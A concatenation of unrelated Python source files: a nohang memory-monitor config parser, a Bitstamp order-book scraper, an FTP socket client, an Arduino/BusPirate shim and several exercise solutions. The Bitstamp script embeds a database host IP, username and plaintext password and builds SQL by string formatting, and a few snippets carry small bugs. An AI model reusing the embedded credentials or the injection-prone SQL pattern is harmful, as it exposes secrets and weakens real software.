(soft_threshold_max_zram_kb, soft_threshold_max_zram_mb,
soft_threshold_max_zram_percent) = calculate_percent('soft_threshold_max_zram')
(hard_threshold_max_zram_kb, hard_threshold_max_zram_mb,
hard_threshold_max_zram_percent) = calculate_percent('hard_threshold_max_zram')
(warning_threshold_min_mem_kb, warning_threshold_min_mem_mb,
warning_threshold_min_mem_percent) = calculate_percent('warning_threshold_min_mem')
(warning_threshold_max_zram_kb, warning_threshold_max_zram_mb,
warning_threshold_max_zram_percent) = calculate_percent('warning_threshold_max_zram')
if 'post_zombie_delay' in config_dict:
post_zombie_delay = string_to_float_convert_test(
config_dict['post_zombie_delay'])
if post_zombie_delay is None:
errprint('Invalid post_zombie_delay, not float\nExit')
exit(1)
if post_zombie_delay < 0:
errprint('post_zombie_delay MUST be >= 0\nExit')
exit(1)
else:
errprint('post_zombie_delay not in config\nExit')
exit(1)
if 'victim_cache_time' in config_dict:
victim_cache_time = string_to_float_convert_test(
config_dict['victim_cache_time'])
if victim_cache_time is None:
errprint('Invalid victim_cache_time, not float\nExit')
exit(1)
if victim_cache_time < 0:
errprint('victim_cache_time MUST be >= 0\nExit')
exit(1)
else:
errprint('victim_cache_time not in config\nExit')
exit(1)
if 'env_cache_time' in config_dict:
env_cache_time = string_to_float_convert_test(
config_dict['env_cache_time'])
if env_cache_time is None:
errprint('Invalid env_cache_time value, not float\nExit')
exit(1)
if env_cache_time < 0:
errprint('env_cache_time MUST be >= 0\nExit')
exit(1)
else:
errprint('env_cache_time not in config\nExit')
exit(1)
if 'exe_timeout' in config_dict:
exe_timeout = string_to_float_convert_test(
config_dict['exe_timeout'])
if exe_timeout is None:
errprint('Invalid exe_timeout value, not float\nExit')
exit(1)
if exe_timeout <= 0:
errprint('exe_timeout MUST be > 0\nExit')
exit(1)
else:
errprint('exe_timeout not in config\nExit')
exit(1)
if 'fill_rate_mem' in config_dict:
fill_rate_mem = string_to_float_convert_test(config_dict['fill_rate_mem'])
if fill_rate_mem is None:
errprint('Invalid fill_rate_mem value, not float\nExit')
exit(1)
if fill_rate_mem <= 0:
errprint('fill_rate_mem MUST be > 0\nExit')
exit(1)
else:
errprint('fill_rate_mem not in config\nExit')
exit(1)
if 'fill_rate_swap' in config_dict:
fill_rate_swap = string_to_float_convert_test(
config_dict['fill_rate_swap'])
if fill_rate_swap is None:
errprint('Invalid fill_rate_swap value, not float\nExit')
exit(1)
if fill_rate_swap <= 0:
errprint('fill_rate_swap MUST be > 0\nExit')
exit(1)
else:
errprint('fill_rate_swap not in config\nExit')
exit(1)
if 'fill_rate_zram' in config_dict:
fill_rate_zram = string_to_float_convert_test(
config_dict['fill_rate_zram'])
if fill_rate_zram is None:
errprint('Invalid fill_rate_zram value, not float\nExit')
exit(1)
if fill_rate_zram <= 0:
errprint('fill_rate_zram MUST be > 0\nExit')
exit(1)
else:
errprint('fill_rate_zram not in config\nExit')
exit(1)
if 'soft_threshold_min_swap' in config_dict:
soft_threshold_min_swap = config_dict['soft_threshold_min_swap']
else:
errprint('soft_threshold_min_swap not in config\nExit')
exit(1)
if 'hard_threshold_min_swap' in config_dict:
hard_threshold_min_swap = config_dict['hard_threshold_min_swap']
else:
errprint('hard_threshold_min_swap not in config\nExit')
exit(1)
if 'post_soft_action_delay' in config_dict:
post_soft_action_delay = string_to_float_convert_test(
config_dict['post_soft_action_delay'])
if post_soft_action_delay is None:
errprint('Invalid post_soft_action_delay value, not float\nExit')
exit(1)
if post_soft_action_delay < 0:
errprint('post_soft_action_delay must be positiv\nExit')
exit(1)
else:
errprint('post_soft_action_delay not in config\nExit')
exit(1)
if 'psi_post_action_delay' in config_dict:
psi_post_action_delay = string_to_float_convert_test(
config_dict['psi_post_action_delay'])
if psi_post_action_delay is None:
errprint('Invalid psi_post_action_delay value, not float\nExit')
exit(1)
if psi_post_action_delay < 0:
errprint('psi_post_action_delay must be positive\nExit')
exit(1)
else:
errprint('psi_post_action_delay not in config\nExit')
exit(1)
if 'hard_threshold_max_psi' in config_dict:
hard_threshold_max_psi = string_to_float_convert_test(
config_dict['hard_threshold_max_psi'])
if hard_threshold_max_psi is None:
errprint('Invalid hard_threshold_max_psi value, not float\nExit')
exit(1)
if hard_threshold_max_psi < 0 or hard_threshold_max_psi > 100:
errprint('hard_threshold_max_psi must be in the range [0; 100]\nExit')
exit(1)
else:
errprint('hard_threshold_max_psi not in config\nExit')
exit(1)
if 'soft_threshold_max_psi' in config_dict:
soft_threshold_max_psi = string_to_float_convert_test(
config_dict['soft_threshold_max_psi'])
if soft_threshold_max_psi is None:
errprint('Invalid soft_threshold_max_psi value, not float\nExit')
exit(1)
if soft_threshold_max_psi < 0 or soft_threshold_max_psi > 100:
errprint('soft_threshold_max_psi must be in the range [0; 100]\nExit')
exit(1)
else:
errprint('soft_threshold_max_psi not in config\nExit')
exit(1)
if 'warning_threshold_max_psi' in config_dict:
warning_threshold_max_psi = string_to_float_convert_test(
config_dict['warning_threshold_max_psi'])
if warning_threshold_max_psi is None:
errprint('Invalid warning_threshold_max_psi value, not float\nExit')
exit(1)
if warning_threshold_max_psi < 0 or warning_threshold_max_psi > 100:
errprint(
'warning_threshold_max_psi must be in the range [0; 100]\nExit')
exit(1)
else:
errprint('warning_threshold_max_psi not in config\nExit')
exit(1)
if 'min_badness' in config_dict:
min_badness = string_to_int_convert_test(
config_dict['min_badness'])
if min_badness is None:
errprint('Invalid min_badness value, not integer\nExit')
exit(1)
if min_badness < 0 or min_badness > 1000:
errprint('Invalud min_badness value\nExit')
exit(1)
else:
errprint('min_badness not in config\nExit')
exit(1)
if 'min_post_warning_delay' in config_dict:
min_post_warning_delay = string_to_float_convert_test(
config_dict['min_post_warning_delay'])
if min_post_warning_delay is None:
errprint('Invalid min_post_warning_delay value, not float\nExit')
exit(1)
if min_post_warning_delay < 1 or min_post_warning_delay > 300:
errprint('min_post_warning_delay value out of range [1; 300]\nExit')
exit(1)
else:
errprint('min_post_warning_delay not in config\nExit')
exit(1)
if 'warning_threshold_min_swap' in config_dict:
warning_threshold_min_swap = config_dict['warning_threshold_min_swap']
else:
errprint('warning_threshold_min_swap not in config\nExit')
exit(1)
if 'max_victim_ancestry_depth' in config_dict:
max_victim_ancestry_depth = string_to_int_convert_test(
config_dict['max_victim_ancestry_depth'])
if min_badness is None:
errprint('Invalid max_victim_ancestry_depth value, not integer\nExit')
exit(1)
if max_victim_ancestry_depth < 1:
errprint('Invalud max_victim_ancestry_depth value\nExit')
exit(1)
else:
errprint('max_victim_ancestry_depth is not in config\nExit')
exit(1)
if 'max_soft_exit_time' in config_dict:
max_soft_exit_time = string_to_float_convert_test(
config_dict['max_soft_exit_time'])
if max_soft_exit_time is None:
errprint('Invalid max_soft_exit_time val'
'ue, not float\nExit')
exit(1)
if max_soft_exit_time < 0:
errprint('max_soft_exit_time must be non-n'
'egative number\nExit')
exit(1)
else:
errprint('max_soft_exit_time is not in config\nExit')
exit(1)
if 'psi_path' in config_dict:
psi_path = config_dict['psi_path']
else:
errprint('psi_path is not in config\nExit')
exit(1)
if 'psi_metrics' in config_dict:
psi_metrics = config_dict['psi_metrics']
else:
errprint('psi_metrics is not in config\nExit')
exit(1)
if 'warning_exe' in config_dict:
warning_exe = config_dict['warning_exe']
if warning_exe != '':
check_warning_exe = True
else:
check_warning_exe = False
else:
errprint('warning_exe is not in config\nExit')
exit(1)
if 'extra_table_info' in config_dict:
extra_table_info = config_dict['extra_table_info']
if (extra_table_info != 'None' and
extra_table_info != 'cgroup_systemd' and
extra_table_info != 'cgroup_unified' and
extra_table_info != 'cmdline' and
extra_table_info != 'environ' and
extra_table_info != 'realpath' and extra_table_info != 'cwd'):
errprint('Invalid config: invalid extra_table_info value\nExit')
exit(1)
else:
errprint('Invalid config: extra_table_info is not in config\nExit')
exit(1)
separate_log = conf_parse_bool('separate_log')
if separate_log:
import logging
log_dir = '/var/log/nohang'
logfile = log_dir + '/nohang.log'
try:
os.mkdir(log_dir)
except FileExistsError:
pass
except PermissionError:
errprint('ERROR: cannot create {}'.format(log_dir))
try:
os.chmod(log_dir, mode=0o750)
except FileNotFoundError:
errprint('ERROR: file not found: {}'.format(log_dir))
except PermissionError:
errprint('ERROR: permission denied: {}'.format(log_dir))
try:
logging.basicConfig(
filename=logfile,
level=logging.INFO,
format="%(asctime)s: %(message)s")
except FileNotFoundError:
errprint('ERROR: file not found: {}'.format(logfile))
except PermissionError:
errprint('ERROR: permission denied: {}'.format(logfile))
if 'min_mem_report_interval' in config_dict:
min_mem_report_interval = string_to_float_convert_test(
config_dict['min_mem_report_interval'])
if min_mem_report_interval is None:
errprint('Invalid min_mem_report_interval value, not float\nExit')
exit(1)
if min_mem_report_interval < 0:
errprint('min_mem_report_interval must be non-negative number\nExit')
exit(1)
else:
errprint('min_mem_report_interval is not in config\nExit')
exit(1)
if 'psi_excess_duration' in config_dict:
psi_excess_duration = string_to_float_convert_test(
config_dict['psi_excess_duration'])
if psi_excess_duration is None:
errprint('Invalid psi_excess_duration value, not float\nExit')
exit(1)
if psi_excess_duration < 0:
errprint('psi_excess_duration must be non-negative number\nExit')
exit(1)
else:
errprint('psi_excess_duration is not in config\nExit')
exit(1)
if 'max_sleep' in config_dict:
max_sleep = string_to_float_convert_test(
config_dict['max_sleep'])
if max_sleep is None:
errprint('Invalid max_sleep value, not float\nExit')
exit(1)
if max_sleep <= 0:
errprint('max_sleep must be positive number\nExit')
exit(1)
else:
errprint('max_sleep is not in config\nExit')
exit(1)
if 'min_sleep' in config_dict:
min_sleep = string_to_float_convert_test(
config_dict['min_sleep'])
if min_sleep is None:
errprint('Invalid min_sleep value, not float\nExit')
exit(1)
if min_sleep <= 0:
errprint('min_sleep must be positive number\nExit')
exit(1)
else:
errprint('min_sleep is not in config\nExit')
exit(1)
if 'over_sleep' in config_dict:
over_sleep = string_to_float_convert_test(
config_dict['over_sleep'])
if over_sleep is None:
errprint('Invalid over_sleep value, not float\nExit')
exit(1)
if over_sleep <= 0:
errprint('over_sleep must be positive number\nExit')
exit(1)
else:
errprint('over_sleep is not in config\nExit')
exit(1)
sensitivity_test_time = over_sleep / 2
if max_sleep < min_sleep:
errprint('min_sleep value must not exceed max_sleep value.\nExit')
exit(1)
if min_sleep < over_sleep:
errprint('over_sleep value must not exceed min_sleep value.\nExit')
exit(1)
if max_sleep == min_sleep:
stable_sleep = True
else:
stable_sleep = False
if print_proc_table_flag:
if not root:
log('WARNING: effective UID != 0; euid={}; processes with other e'
'uids will be invisible for nohang'.format(self_uid))
func_print_proc_table()
##########################################################################
if (low_memory_warnings_enabled or
post_action_gui_notifications or
check_warning_exe or
soft_actions):
import threading
import shlex
from subprocess import Popen, TimeoutExpired
psi_support = os.path.exists(psi_path)
##########################################################################
# Get KiB levels if it's possible.
soft_threshold_min_swap_tuple = get_swap_threshold_tuple(
soft_threshold_min_swap)
hard_threshold_min_swap_tuple = get_swap_threshold_tuple(
hard_threshold_min_swap)
warning_threshold_min_swap_tuple = get_swap_threshold_tuple(
warning_threshold_min_swap)
swap_kb_dict = dict()
swap_term_is_percent = soft_threshold_min_swap_tuple[1]
if swap_term_is_percent:
soft_threshold_min_swap_percent = soft_threshold_min_swap_tuple[0]
else:
soft_threshold_min_swap_kb = soft_threshold_min_swap_tuple[0]
swap_kb_dict['soft_threshold_min_swap_kb'] = soft_threshold_min_swap_kb
swap_kill_is_percent = hard_threshold_min_swap_tuple[1]
if swap_kill_is_percent:
hard_threshold_min_swap_percent = hard_threshold_min_swap_tuple[0]
else:
hard_threshold_min_swap_kb = hard_threshold_min_swap_tuple[0]
swap_kb_dict['hard_threshold_min_swap_kb'] = hard_threshold_min_swap_kb
swap_warn_is_percent = warning_threshold_min_swap_tuple[1]
if swap_warn_is_percent:
warning_threshold_min_swap_percent = warning_threshold_min_swap_tuple[0]
else:
warning_threshold_min_swap_kb = warning_threshold_min_swap_tuple[0]
swap_kb_dict['warning_threshold_min_swap_kb'
] = warning_threshold_min_swap_kb
##########################################################################
if print_config_at_startup or check_config_flag:
check_config()
##########################################################################
# for calculating the column width when printing mem and zram
mem_len = len(str(round(mem_total / 1024.0)))
if post_action_gui_notifications:
notify_sig_dict = {SIGKILL: 'Killing',
SIGTERM: 'Terminating'}
# convert rates from MiB/s to KiB/s
fill_rate_mem = fill_rate_mem * 1024
fill_rate_swap = fill_rate_swap * 1024
fill_rate_zram = fill_rate_zram * 1024
warn_time_now = 0
warn_time_delta = 1000 # ?
warn_timer = 0
##########################################################################
if not root:
log('WARNING: effective UID != 0; euid={}; processes with other e'
'uids will be invisible for nohang'.format(self_uid))
# Try to lock all memory
mlockall()
##########################################################################
# print_self_rss()
psi_avg_string = '' # will be overwritten if PSI monitoring enabled
mem_used_zram = 0
if print_mem_check_results:
# to find delta mem
wt2 = 0
new_mem = 0
# init mem report interval
report0 = 0
# handle signals
for i in sig_list:
signal(i, signal_handler)
psi_timestamp0 = monotonic()
psi_delta0 = 0
threshold = None
mem_info = None
CHECK_PSI = False
if psi_support and not ignore_psi:
CHECK_PSI = True
hard_threshold_psi_exceeded_timer = 0
soft_threshold_psi_exceeded_timer = 0
psi_threshold = zram_threshold = zram_info = psi_info = None
CHECK_ZRAM = not ignore_zram
log('Monitoring has started!')
stdout.flush()
display_env = 'DISPLAY='
dbus_env = 'DBUS_SESSION_BUS_ADDRESS='
user_env = 'USER='
envd = dict()
envd['list_with_envs'] = envd['t'] = None
cmd_num_dict = dict()
cmd_num_dict['cmd_num'] = 0
m0 = monotonic()
pt0 = process_time()
##########################################################################
os.execvp('/bin/sleep', ['FOOOOOOO', '999'])
|
'''
Created on Jan 24, 2016
@author: Andrei Padnevici
@note: This is an exercise: 6.4
'''
str = input("Please enter a string: ")
char = input("Please enter a character: ")
print(str.count(char)) |
import json
import os
import sys
import pandas.io.sql as psql
import requests
crypto_tools_dir = os.getcwd().split('/scripts/')[0] + '/scripts/'
sys.path.append(crypto_tools_dir)
from crypto_tools import *
class PopulateCryptoBitstamp(object):
"""
"""
def __init__(self):
"""
"""
self.port = 3306
self.host = "159.89.20.249"
self.database_name = 'crypto_test'
self.user = 'toby'
self.password = 'R1i9p1p1l9e0$'
self.database = DatabaseConnect(self.host, self.database_name, self.user, self.password, self.port)
self.database.database_connect()
self.get_bitstamp_exchange_id()
def get_bitstamp_exchange_id(self):
"""
"""
sql_str = """SELECT id FROM crypto_test.exchange
WHERE name = 'bitstamp' """
results = psql.read_sql(sql_str, con=self.database.mydb)
self.exchange_id = results['id'].loc[0]
def get_bitstamp_asset_pairs_lookup(self):
"""
"""
sql_str = """SELECT apl.name,apl.id AS asset_pairs_lookup_id
FROM crypto_test.asset_pairs_lookup apl
INNER JOIN crypto_test.exchange e ON e.id = apl.exchange_id
WHERE e.name = 'bitstamp'"""
results = psql.read_sql(sql_str, con=self.database.mydb)
asset_pairs_lookup_dict = {}
self.asset_pairs_list = results['name'].tolist()
self.asset_pairs_str = ','.join(self.asset_pairs_list)
print (self.asset_pairs_str)
for ind, row in results.T.iteritems():
name = row['name']
asset_pairs_lookup_dict[name] = row['asset_pairs_lookup_id']
self.asset_pairs_lookup_dict = asset_pairs_lookup_dict
def populate_bitstamp_data(self):
"""
"""
self.get_bitstamp_asset_pairs_lookup()
for bitstamp_asset_pair in self.asset_pairs_list:
#print (bitstamp_asset_pair)
url = """https://www.bitstamp.net/api/v2/order_book/%s/""" % (bitstamp_asset_pair)
all_response = requests.get(url)
all_json = all_response.text
all_json_dict = json.loads(all_json)
timestamp = all_json_dict['timestamp']
# bitstamp timestamp, no order time of order
order_time = datetime.fromtimestamp(int(timestamp)).strftime('%Y-%m-%d %H:%M:%S')
bids = all_json_dict['bids']
asks = all_json_dict['asks']
asset_pairs_lookup_id = self.asset_pairs_lookup_dict[bitstamp_asset_pair]
bid_ask_list = [[1, bids], [2, asks]]
for order_type in bid_ask_list:
order_type_id = order_type[0]
x = 0
for order in order_type[1]:
x = x +1
price = order[0]
quantity = order[1]
# need to remove trailing zeros before and after decimal
new_price = '{0:g}'.format(float(price))
new_quantity = '{0:g}'.format(float(quantity))
ut = datetime.now()
sql_str = """INSERT IGNORE INTO crypto_test.order_book(asset_pairs_lookup_id,order_type_id,price,quantity,order_time,server_time,ut)
VALUES(%s,%s,%s,%s,"%s","%s","%s")
""" % (
asset_pairs_lookup_id, order_type_id, float(new_price), float(quantity), order_time, order_time, ut)
self.database.cursor.execute(sql_str)
try:
self.database.mydb.commit()
except:
self.database.mydb.rollback()
#If first 5 rows of datframe we want to insert into live.
if x < 6:
ut = datetime.now()
ob_last_row_id = self.database.cursor.lastrowid
sql_str = """INSERT IGNORE INTO crypto_test.order_book_live(order_book_id,ut)
VALUES(%s,"%s")
"""%(ob_last_row_id,ut)
self.database.cursor.execute(sql_str)
try:
self.database.mydb.commit()
except:
self.database.mydb.rollback()
def main():
"""
"""
PC = PopulateCryptoBitstamp()
PC.populate_bitstamp_data()
if __name__ == "__main__":
main() |
from persian_captcha import PersianCaptchaField
from captcha.conf import settings as captcha_settings
from captcha.models import CaptchaStore, get_safe_now
from captcha.fields import CaptchaField, CaptchaTextInput
from django import forms
class ProducerRegisterForm1(forms.Form):
center_name = forms.CharField(max_length=30)
executive_manager= forms.CharField(max_length=30)
address = forms.Textarea()
phone_number = forms.CharField(max_length=30)
password = forms.CharField(widget=forms.PasswordInput, max_length=30)
retyped_pass = forms.CharField(widget=forms.PasswordInput, max_length=30)
email = forms.EmailField()
website = forms.CharField()
captcha = PersianCaptchaField()
|
import gspread
from oauth2client.service_account import ServiceAccountCredentials
scope = ["https://spreadsheets.google.com/feeds",'https://www.googleapis.com/auth/spreadsheets',"https://www.googleapis.com/auth/drive.file","https://www.googleapis.com/auth/drive"]
creds = ServiceAccountCredentials.from_json_keyfile_name("client_secret.json", scope)
client = gspread.authorize(creds)
sheet = client.open('Python test data - cleaning').sheet1
results = sheet.get_all_records()
print(results)
|
#
# @lc app=leetcode.cn id=187 lang=python3
#
# [187] 重复的DNA序列
#
# @lc code=start
class Solution:
def findRepeatedDnaSequences(self, s: str) -> List[str]:
res = []
left, right = 0, 0
window, seen = [], {}
while right < len(s):
# 扩大窗口,加入s[right]
window.append(s[right])
right += 1
# window达到要求是
if right - left == 10:
window_str = ''.join(window)
if window_str in seen and window_str not in res:
res.append(window_str)
else:
seen[window_str] = 1
# 缩小窗口,移除s[left]
window = window[1:]
left += 1
return res
# @lc code=end
|
import argparse
import time
import pandas as pd
from sklearn.cluster import DBSCAN
from PROJECT import *
def main():
parser = argparse.ArgumentParser(description='DBSCAN in Python')
parser.add_argument('-f', '--filename', help='Name of the file', required=True)
parser.add_argument('-s', '--eps', help='Radius Threshold', required=False, type=float, default=100)
parser.add_argument('-p', '--minPts', help='Minimum number of points', required=False, type=int, default=200)
args = parser.parse_args()
filename = args.filename
eps = args.eps
min_pts = args.minPts
df = pd.read_csv(filename, converters={'date_time': parse_dates})
date_time = df['date_time']
df = df.drop('date_time', 1)
start = time.time()
db = DBSCAN(eps=eps, min_samples=min_pts, metric=geo_distance).fit(df)
print("[DBSCAN] Finish all in {} seconds".format(time.time() - start))
df['date_time'] = date_time
df['cluster'] = db.labels_
output_name = "/var/www/project/dbscan_result_{}_{}.csv".format(eps, min_pts)
transform_save(df, output_name)
if __name__ == '__main__':
main()
|
def sumofdigits(num):
int_to_string = str(num)
test = list(map(int, int_to_string.strip()))
return (sum(test))
num = int(input())
sum_of_digits = sumofdigits(num)
for i in range(num-1, 10, -1):
if(sumofdigits(i) > sum_of_digits):
print(i)
break
else:
if(i == 11):
print(N)
break |
#!_*_coding:utf-8_*_
import optparse
import socket
import json
import os
class FTPClient:
"""Ftp Client"""
MSG_SIZE = 1024
def __init__(self):
self.username = None
self.terminal_display = None
parser = optparse.OptionParser()
parser.add_option("-s","--server",dest="server",help="ftp server ip_addr")
parser.add_option("-P","--port",type="int",dest="port",help="ftp server port")
parser.add_option("-u","--username",dest="username",help="username info")
parser.add_option("-p","--password",dest="password",help="password info")
self.option,self.args = parser.parse_args()
self.argv_verification()
self.make_connection()
def argv_verification(self):
"""检测参数合法性"""
if not self.option.server or not self.option.port:
exit("Error: must supply server and port parameters")
def make_connection(self):
"""建立socket链接"""
self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.sock.connect((self.option.server,self.option.port))
def get_response(self):
data = self.sock.recv(self.MSG_SIZE)
return json.loads(data.decode('utf-8'))
def auth(self):
"""用户认证"""
count = 0
while count < 3 :
username = input("username>>>:").strip()
if not username:continue
password = input("password>>>:").strip()
self.send_msg('auth',username=username,password=password)
response = self.get_response()
if response.get('status_code') == 200:
self.username = username
self.terminal_display = "[%s]>>>:"%self.username
return True
else:
print(response.get("status_msg"))
count += 1
def interactive(self):
"""处理与Ftpserver的交互"""
if self.auth():
while True:
user_input = input(self.terminal_display).strip()
if not user_input:continue
cmd_list = user_input.split()
if hasattr(self,"_%s"%cmd_list[0]):
func = getattr(self,"_%s"%cmd_list[0])
func(cmd_list[1:])
else:
print("-bash: %s: command not found"%cmd_list[0])
def parameter_check(self,args,min_args=None,max_args=None,exact_args=None):
if min_args:
if len(args) < min_args:
print("must provide at least %s parameters but %s received"%(min_args,len(args)))
return False
if max_args:
if len(args) > max_args:
print("need at most %s paramenters but %s received."%(max_args,len(args)))
return False
if exact_args:
if len(args) != exact_args:
print("need at most %s paramenters but %s received." % (exact_args, len(args)))
return False
return True
def send_msg(self,action_type,**kwargs):
"""打包消息并发送到远程"""
msg_data = {
"action_type":action_type,
"fill":""
}
msg_data.update(kwargs)
bytes_msg = json.dumps(msg_data).encode('utf-8')
if self.MSG_SIZE > len(bytes_msg):
msg_data['fill'] = msg_data['fill'].zfill(self.MSG_SIZE - len(bytes_msg))
self.sock.send(bytes_msg)
def _ls(self,cmd_args):
self.send_msg(action_type='ls')
response = self.get_response()
if response.get('status_code') == 302:
cmd_result_size = response.get('cmd_result_size')
received_size = 0
cmd_result = b""
while received_size < cmd_result_size:
if cmd_result_size - received_size < 8192:
data = self.sock.recv(cmd_result_size - received_size)
else:
data = self.sock.recv(8192)
cmd_result += data
received_size += len(data)
else:
print(cmd_result.decode('utf-8'))
def _cd(self,cmd_args):
if self.parameter_check(cmd_args, exact_args=1):
target_dir = cmd_args[0]
self.send_msg('cd',target_dir=target_dir)
response = self.get_response()
if response.get('status_code') == 350:
self.terminal_display = "[/%s]"%response.get('current_dir')
else:
print(response.get('status_msg'))
def _get(self,cmd_args):
"""download file from ftp server"""
if self.parameter_check(cmd_args,min_args=1):
filename = cmd_args[0]
self.send_msg(action_type='get',filename=filename)
response = self.get_response()
if response.get('status_code') == 301:
file_size = response.get('file_size')
received_size = 0
with open(filename,'wb') as f:
while received_size < file_size:
if file_size - received_size < 8192:
data = self.sock.recv(file_size - received_size)
else:
data = self.sock.recv(8192)
received_size += len(data)
f.write(data)
else:
print("---file [%s] rece done, received size [%s]---"%(filename,file_size))
f.close()
else:
print(response.get('status_msg'))
def _put(self,cmd_args):
if self.parameter_check(cmd_args, min_args=1):
local_file = cmd_args[0]
if os.path.isfile(local_file):
total_size = os.path.getsize(local_file)
self.send_msg('put',file_size=total_size,filename=local_file)
f = open(local_file,'rb')
uploaded_size = 0
last_percent = 0
for line in f:
self.sock.send(line)
uploaded_size += len(line)
current_percent = int(uploaded_size / total_size * 100)
if current_percent > last_percent:
print('#'*int(current_percent/2) + "{percent}".format(percent=current_percent),end="\r")
last_percent = current_percent
else:
print('\n')
print('file upload done'.center(50,'-'))
f.close()
def _mkdir(self,cmd_args):
if self.parameter_check(cmd_args,min_args=1):
dir_name = cmd_args[0]
self.send_msg(action_type='mkdir',dir_name=dir_name)
response = self.get_response()
if response.get('status_code') != 360:
print(response.get('mkdir_msg'))
def _rm(self,cmd_args):
if self.parameter_check(cmd_args, min_args=1):
rm_cmd = cmd_args[0]
self.send_msg(action_type='rm',rm_cmd=rm_cmd)
reponse = self.get_response()
if reponse.get('status_code') != 350:
print(reponse.get('status_msg'))
if __name__ == "__main__":
client = FTPClient()
client.interactive() |
#!/usr/bin/env python
import sys
import os
import time
import ConfigParser
import serial
from buspirate import BusPirate
HIGH = 1
LOW = 0
INPUT = 0
OUTPUT = 1
class SPIClass:
def __init__(self, bus):
self.bus = bus
def begin(self):
self.bus.set_mode("spi")
# First read byte is hosed, read it up now
self.bus.command("[r]")
self.bus.get_response()
self.bus.get_response()
self.bus.get_response()
def csn(self, val):
if val == LOW:
self.bus.command("{")
self.bus.expect_response("CS ENABLED")
else:
self.bus.command("}")
self.bus.expect_response("CS DISABLED")
def transfer(self, byte):
self.bus.command(hex(byte))
self.bus.get_response()
read = self.bus.get_response()
assert read.startswith("READ: ")
return int(read[len("READ: "):], 16)
class SerialMockClass:
def __init__(self):
pass
def begin(self, baud):
pass
def print_(self, data, format=None):
if not format:
if type(data) != type(""):
sys.stdout.write(str(data))
else:
sys.stdout.write(data)
elif format == HEX:
sys.stdout.write(hex(data))
def println(self, data, format=None):
self.print_(data, format)
print
class Arduino:
def __init__(self, port=None, board=None, debug=False):
self.board = board
self.board_config = None
self.port = port
self.board_type = None
if self.port is None:
if board:
self.board_config = ConfigParser.ConfigParser()
self.board_config.read("board.cfg")
port_spec = self.board_config.get(board, "connection")
elif "BUSNINJA_PORT" in os.environ:
port_spec = os.environ["BUSNINJA_PORT"]
elif os.path.exists("board.cfg"):
self.board_config = ConfigParser.ConfigParser()
self.board_config.read("board.cfg")
self.board = self.board_config.sections()[0]
port_spec = self.board_config.get(self.board, "connection")
print "Warning: using first board defined in board.cfg"
else:
port_spec = self.detect_board()
self.board_type, serial_dev, baud = self.parse_port_spec(port_spec)
self.port = serial.Serial(serial_dev, baud, timeout=0.3)
if self.board_type is None:
self.board_type = "arduino"
soft_uart = False
if self.board_type == "arduino":
self.LED = 13
else:
soft_uart = True
self.LED = 0
self.bus = BusPirate(self.port, soft_uart=soft_uart, debug=debug)
self.bus.connect()
self.SPI = SPIClass(self.bus)
self.Serial = SerialMockClass()
def detect_board(self):
return "arduino:/dev/ttyUSB0:115200"
def parse_port_spec(self, port_spec):
arr = port_spec.split(":")
dev_type = None
baud = 9600
if len(arr) == 1:
port_str = arr[0]
elif len(arr) == 2:
try:
baud = int(arr[1])
port_str = arr[0]
except ValueError:
board_type = arr[0]
port_str = arr[1]
elif len(arr) == 3:
board_type = arr[0]
port_str = arr[1]
baud = int(arr[2])
else:
raise ValueError("Invalid syntax for BUSNINJA_PORT: expected [<device_type>:]/dev/<serial>[:<baud>]")
return board_type, port_str, baud
def get_board_type(self):
return self.board_type
def get_board_setting(self, option):
return self.board_config.get(self.board, option)
def get_board_int(self, option):
return self.board_config.getint(self.board, option)
def run(self, obj):
if type(obj) == type(lambda: None):
setup = obj
loop = None
elif type(obj) == type({}):
# globals dict
setup = obj["setup"]
loop = obj["loop"]
else:
# app object
setup = obj.setup
loop = obj.loop
try:
setup()
if loop:
while True:
loop()
except:
self.drain()
raise
def run_func(self, func):
try:
func()
except:
self.port.read(100)
raise
def drain(self):
"""Some boards have bugs which may cause them misbehave if some
'cleanup' is not performed after usage, e.g. TI Launchpad's USB
connection may hang due to output buffer overflow if it's not
drained"""
self.port.read(100)
def millis(self):
return int(time.time() * 1000) & 0xffffffff
def delay(self, miliseconds):
time.sleep(float(miliseconds) / 1000)
def pinMode(self, pin, mode):
cmd = "pinmode p%d %s" % (pin, ["in", "out"][mode])
self.bus.command(cmd)
def digitalWrite(self, pin, val):
# cmd = "p%s.%s=%s" % (pin / 8 + 1, pin % 8, val)
cmd = "p%d=%d" % (pin, val)
self.bus.command(cmd)
def digitalRead(self, pin):
cmd = "p%s.%s?" % (pin / 8 + 1, pin % 8)
self.bus.command(cmd)
resp = self.bus.get_response()
assert resp.startswith("READ: "), resp
return int(resp[-1])
def digitalPulse_us(self, pin, val, delay_us):
"""Make pulse of not less than specified microsecond duration on a pin
(exact duration may be longer per limitations of a specific board).
"""
cmd = "p%d=%d &:%d p%d=%d" % (pin, val, delay_us, pin, not val)
self.bus.command(cmd)
default_arduino = None
def create_proxy_func(func_name, obj):
"""Create global function named func_name which will
call method of the same name of obj."""
method = getattr(obj, func_name)
f = lambda *args: method(*args)
globals()[func_name] = f
def init(*args, **kwargs):
global default_arduino
default_arduino = Arduino(*args, **kwargs)
globs = ["LED", "SPI", "Serial"]
for g in globs:
globals()[g] = getattr(default_arduino, g)
methods = [
"run", "millis", "delay", "pinMode", "digitalRead", "digitalWrite",
"digitalPulse_us"
]
for m in methods:
create_proxy_func(m, default_arduino)
def default_board():
global default_arduino
return default_arduino
|
from direct.distributed.DistributedObjectAI import DistributedObjectAI
from direct.directnotify import DirectNotifyGlobal
class DistributedTunnelAI(DistributedObjectAI):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedTunnelAI')
def __init__(self, air):
DistributedObjectAI.__init__(self, air) |
import logging
def get_logger():
logger = logging.getLogger(__name__)
handler = logging.FileHandler('offers.log')
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.debug("Prueba log")
return logger
_logger = get_logger()
|
from functools import reduce
def f(N,A,B):
return print (reduce(lambda a,x:a+1 if x in A else a-1 if x in B else a,N,0))
|
from utils import read_file
def count_trees(right:int, down:int, treemapfile:str):
tree_map = read_file(treemapfile)
encounters = 0
x = 0
skip = down
# print(tree_map[0])
for n in range(1, len(tree_map)):
line = tree_map[n]
if skip != 1:
skip -= 1
# print(line)
continue
skip = down
x = (x + right) % (len(line))
# print(f"{line[0:x]}[{line[x]}]{line[x+1:]}")
if line[x] == "#":
encounters += 1
# print("\n")
return encounters
def test():
assert count_trees(1, 1, "day3_testinput") == 2
